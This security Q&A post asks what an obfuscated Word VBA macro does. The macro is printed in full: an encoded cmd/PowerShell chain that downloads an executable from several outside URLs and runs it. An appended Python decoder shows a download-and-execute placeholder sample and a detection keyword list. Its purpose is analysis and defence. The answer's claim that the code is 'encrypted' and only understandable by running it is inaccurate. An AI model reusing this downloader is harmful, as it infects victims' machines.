Tags: translation, malware, trojan

What is this VBA malware code trying to do?


My other half was sent a piece of malware in MS Word VBA. The document was opened, editing enabled, and the Trojan was missed by the antivirus for some reason.

I'm 99% sure the system has been cleaned and there are no lasting effects; however, I'd like to understand what the code was trying to do so I can be 100% sure.

What I have managed to translate is beyond my skill.

This is the original function from the VBA:

Function BfXNd()
    ' The function's only output is BfXNd, the concatenation of the four string
    ' expressions kRRCNwn, jhcbfQ, pHiJQ and vflzlZjAjXX below. Each Chr(Format(...))
    ' term hides one character: Chr(Format(7 + 7 + 1 + 16 + 68)) = Chr(99) = "c",
    ' Chr(Format(4 + 4 + 1 + 11 + 47)) = Chr(67) = "C", and
    ' Chr(Format(2 + 2 + 0 + 5 + 25)) = Chr(34) = a double quote. The "^" characters
    ' are cmd.exe escapes that disappear when the line is parsed, and several
    ' fragments are written backwards (e.g. "lle^hsr^e^wo^p" is "powershell" reversed).
    ' The Dim/array assignments read variables that are not shown in the post and
    ' are never used afterwards: they are filler that makes the macro look legitimate.
    Dim nORTSq(3)
    nORTSq(0) = Right(LCsbFFjF, 428)
    nORTSq(1) = Left(JErht, 810)
    nORTSq(2) = Mid(pjzflRs, 58, 796)
    Dim rnMCEl(3)
    rnMCEl(0) = Left(JErht, 810)
    rnMCEl(1) = Mid(pjzflRs, 58, 796)
    rnMCEl(2) = MidB(iOGKfiB, 537, 348)
    Dim HXiIk(2)
    HXiIk(0) = Left(JErht, 810)
    HXiIk(1) = Mid(pjzflRs, 58, 796)
    kRRCNwn = Chr(Format(7 + 7 + 1 + 16 + 68)) + "md /V:O/" + Chr(Format(4 + 4 + 1 + 11 + 47)) + Chr(Format(2 + 2 + 0 + 5 + 25)) + "s^e^t e^" + "4= ^ ^ ^   " + " ^ ^    ^ ^ ^   ^}^}^" + "{^h" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^t^a" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^};^ka^" + "er^b;Bv^M$ ^met^I^-^e^k^" + "ovn^I^;)BvM^$^ ,iE^S^$(^e^li" + "^Fd^a^oln^w^oD.^W^W^Y${^y" + "r^t^{)" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "R" + "^w$ ni^ i^ES$(h" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "aer^o^f" + "^;^'ex^e.'^+o^bV$+'^\'+" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^i" + "lbup:vne^$=^BvM^$;'68^9'^ =^ ^"
    Dim WlsRmu(5)
    WlsRmu(0) = MidB(iOGKfiB, 537, 348)
    WlsRmu(1) = MidB(iOGKfiB, 537, 348)
    WlsRmu(2) = Right(LCsbFFjF, 428)
    WlsRmu(3) = Right(LCsbFFjF, 428)
    WlsRmu(4) = Left(JErht, 810)
    Dim ojijX(2)
    ojijX(0) = MidB(iOGKfiB, 537, 348)
    ojijX(1) = MidB(iOGKfiB, 537, 348)
    Dim nHDNir(2)
    nHDNir(0) = Mid(pjzflRs, 58, 796)
    nHDNir(1) = Right(LCsbFFjF, 428)
    jhcbfQ = "o^bV$;)'^@'(t^i^lpS.^'lk^U4^um" + "j4S/s^e^.ynnadrm//:" + "^p^tt^h^@JEVk5^m" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^W" + "/r^b.^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".no" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^e" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "i^pa//:^p^tt^h@^A^i1i^U" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^d^" + "I^Q/^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^.^sn" + "o^it^u^lo^s-ah" + "sna^d//:^ptt^h@bu^A"
    Dim tmiOA(5)
    tmiOA(0) = MidB(iOGKfiB, 537, 348)
    tmiOA(1) = Left(JErht, 810)
    tmiOA(2) = Left(JErht, 810)
    tmiOA(3) = Mid(pjzflRs, 58, 796)
    tmiOA(4) = Mid(pjzflRs, 58, 796)
    pHiJQ = "^q^HHT^M/m" + "o" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".^i^lam^p^us^ten//:^p^tth@z^" + "O^SdrnmX/^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".no^is^sa^" + "pmo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "ht" + "i^a^f//:^p^t^th'^=" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "Rw^$;t" + "n^ei^l" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "^b^e^W^.teN" + " t" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^e^jbo^-^wen=W^W" + "^Y$ lle^hsr^e^wo^p&&^f^or" + " /^L %^t ^in (^374;^-^1^;0)d^o" + " ^s^e^t ^qhL=!^qhL!!e^4:~%^t,"
    Dim isfqZj(5)
    isfqZj(0) = Left(JErht, 810)
    isfqZj(1) = MidB(iOGKfiB, 537, 348)
    isfqZj(2) = Mid(pjzflRs, 58, 796)
    isfqZj(3) = MidB(iOGKfiB, 537, 348)
    isfqZj(4) = Right(LCsbFFjF, 428)
    Dim HCOVDH(2)
    HCOVDH(0) = MidB(iOGKfiB, 537, 348)
    HCOVDH(1) = Left(JErht, 810)
    Dim YuAhz(5)
    YuAhz(0) = Left(JErht, 810)
    YuAhz(1) = Mid(pjzflRs, 58, 796)
    YuAhz(2) = Right(LCsbFFjF, 428)
    YuAhz(3) = Mid(pjzflRs, 58, 796)
    YuAhz(4) = Mid(pjzflRs, 58, 796)
    vflzlZjAjXX = "1!&&^i^f" + " %^t ^ls^s ^1 " + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^al^l " + "%^qhL:^~^5%" + Chr(Format(2 + 2 + 0 + 5 + 25)) + ""
    ' Result: a single cmd /V:O/C"..." line that sets a variable to the reversed
    ' command, rebuilds it character by character with for /L, and runs it via call.
    BfXNd = kRRCNwn + jhcbfQ + pHiJQ + vflzlZjAjXX
    Dim kmYzM(4)
    kmYzM(0) = MidB(iOGKfiB, 537, 348)
    kmYzM(1) = Mid(pjzflRs, 58, 796)
    kmYzM(2) = Left(JErht, 810)
    kmYzM(3) = Mid(pjzflRs, 58, 796)
    Dim hNkzi(5)
    hNkzi(0) = Mid(pjzflRs, 58, 796)
    hNkzi(1) = Left(JErht, 810)
    hNkzi(2) = Left(JErht, 810)
    hNkzi(3) = Mid(pjzflRs, 58, 796)
    hNkzi(4) = MidB(iOGKfiB, 537, 348)
End Function

Solution

  • It's encrypted code.

    There's no way to tell what it's doing without running it far enough to have it decrypt itself.

    When run, the strings will be converted back into commands of some sort, at which point you can tell what it's going to do.

    If you want to examine it, spin up a Windows virtual machine (you can get them free from Microsoft), install Word, and you can step through the code using the Debugger, which is in the "Macros" menu in Word.
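Added example, not part of the question or the answer above: the string building in this kind of macro can also be undone on paper, without stepping through it in a VM, because every layer is reversible. The Python below evaluates the Chr(Format(...)) arithmetic and the literal concatenation, strips the cmd.exe caret escapes, replays the set / for /L / call reversal idiom, and then lists the keywords a defender would flag in the result. The obfuscated expression it works on is a constructed sample written in the same style as the macro above (the loop bound and skip offset are chosen to be self-consistent and the URL is a non-resolving placeholder), and the function names vba_concat, strip_carets, decode_reversed_payload and indicators are this example's own.

```python
import re

# Constructed sample in the same style as the macro in the question (not the
# original strings): Chr(Format(<sum>)) hides single characters, '^' escapes
# pad the cmd line, and the real command sits reversed in the variable e4.
# The URL is a non-resolving placeholder; the loop bound (116) and the skip
# offset (5) are chosen so the sample decodes cleanly.
VBA_EXPR = (
    'Chr(Format(7 + 7 + 1 + 16 + 68)) + "md /V:O/" + Chr(Format(4 + 4 + 1 + 11 + 47))'
    ' + Chr(Format(2 + 2 + 0 + 5 + 25)) + "s^e^t e^4=ex^e.a m^etI-ek^ovnI;)\'^exe.a\',\'ex^e.a/"'
    ' + "dila^vni.elpm^axe//:p^tth\'(eli^Fdaoln^woD.w$;tn^eilCbeW.teN t^"'
    ' + Chr(Format(7 + 7 + 1 + 16 + 68)) + "ejbo-w^en=w$ lle^hsrew^op#####&&^f^or /^L %^t ^in (^116;^-^1^;0)d^o"'
    ' + " ^s^e^t ^qhL=!^qhL!!e^4:~%^t,1!&&^i^f %^t ^ls^s ^1 " + Chr(Format(7 + 7 + 1 + 16 + 68))'
    ' + "^al^l %^qhL:^~^5%" + Chr(Format(2 + 2 + 0 + 5 + 25))'
)

# What the constructed sample runs once every layer is undone.
PAYLOAD = ("powershell $w=new-object Net.WebClient;"
           "$w.DownloadFile('http://example.invalid/a.exe','a.exe');Invoke-Item a.exe")

_TOKEN = r'"(?:[^"]|"")*"|Chr\(Format\([\d\s+]+\)\)'
_TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|Chr\(Format\(([\d\s+]+)\)\)')


def vba_concat(expr: str) -> str:
    """Evaluate a VBA expression made only of string literals and
    Chr(Format(a + b + ...)) terms joined by '+'. Format() of an integer is its
    decimal text, and Chr() coerces that text back into a code point."""
    if not re.fullmatch(rf'\s*(?:{_TOKEN})(?:\s*\+\s*(?:{_TOKEN}))*\s*', expr):
        raise ValueError("expression is not just literals and Chr(Format(...)) terms")
    parts = []
    for lit, arith in _TOKEN_RE.findall(expr):
        if arith:
            parts.append(chr(sum(int(n) for n in arith.split('+'))))
        else:
            parts.append(lit.replace('""', '"'))  # VBA doubles quotes inside literals
    return ''.join(parts)


def strip_carets(s: str) -> str:
    """cmd.exe drops '^' when it parses an unquoted command line: '^x' -> 'x', '^^' -> '^'."""
    return re.sub(r'\^(.)', r'\1', s, flags=re.S)


_IDIOM = re.compile(
    r'set (?P<src>\w+)=(?P<value>.*?)&&'
    r'for /L %(?P<i>\w) in \((?P<start>\d+);-1;0\)\s*do '
    r'set (?P<dst>\w+)=!(?P=dst)!!(?P=src):~%(?P=i),1!&&'
    r'if %(?P=i) lss 1 call %(?P=dst):~(?P<skip>\d+)%',
    re.S,
)


def decode_reversed_payload(cmdline: str) -> str:
    """Undo the cmd /V:O/C"set X=...&&for /L ... call %Y:~N%" idiom statically:
    the loop copies X into Y one character at a time from index start down to 0,
    then call executes Y from offset N onward."""
    m = re.fullmatch(r'cmd /V:O/C"(.*)"', cmdline, re.S)
    if not m:
        raise ValueError('not a cmd /V:O/C"..." wrapper')
    body = strip_carets(m.group(1))  # /C drops the outer quotes, then escapes are processed
    idiom = _IDIOM.search(body)
    if not idiom:
        raise ValueError("set / for /L / call reversal idiom not found")
    value = idiom['value']
    rebuilt = value[:int(idiom['start']) + 1][::-1]  # !X:~n,1! past the end expands to ''
    return rebuilt[int(idiom['skip']):]


SUSPICIOUS = ('powershell', 'Net.WebClient', 'DownloadFile', 'Invoke-Item', '$env:public')


def indicators(text: str) -> list:
    """Keywords a reviewer or a detection rule should flag in the decoded command."""
    low = text.lower()
    return [k for k in SUSPICIOUS if k.lower() in low]


if __name__ == "__main__":
    cmdline = vba_concat(VBA_EXPR)
    print("stage 1 (cmd line the macro returns):", cmdline)
    decoded = decode_reversed_payload(cmdline)
    print("stage 2 (command that call would run):", decoded)
    print("indicators:", indicators(decoded))
```

To apply this to the macro in the question, paste the expression `kRRCNwn + jhcbfQ + pHiJQ + vflzlZjAjXX` (with each variable's right-hand side substituted in) in place of VBA_EXPR; the Dim/array lines are dead code and can be ignored. The decoded output is for reading, never for running: the point is that the keywords it exposes (a PowerShell download-and-execute chain) are what the document was after, and the same keywords are what endpoint logging and macro-scanning rules should alert on.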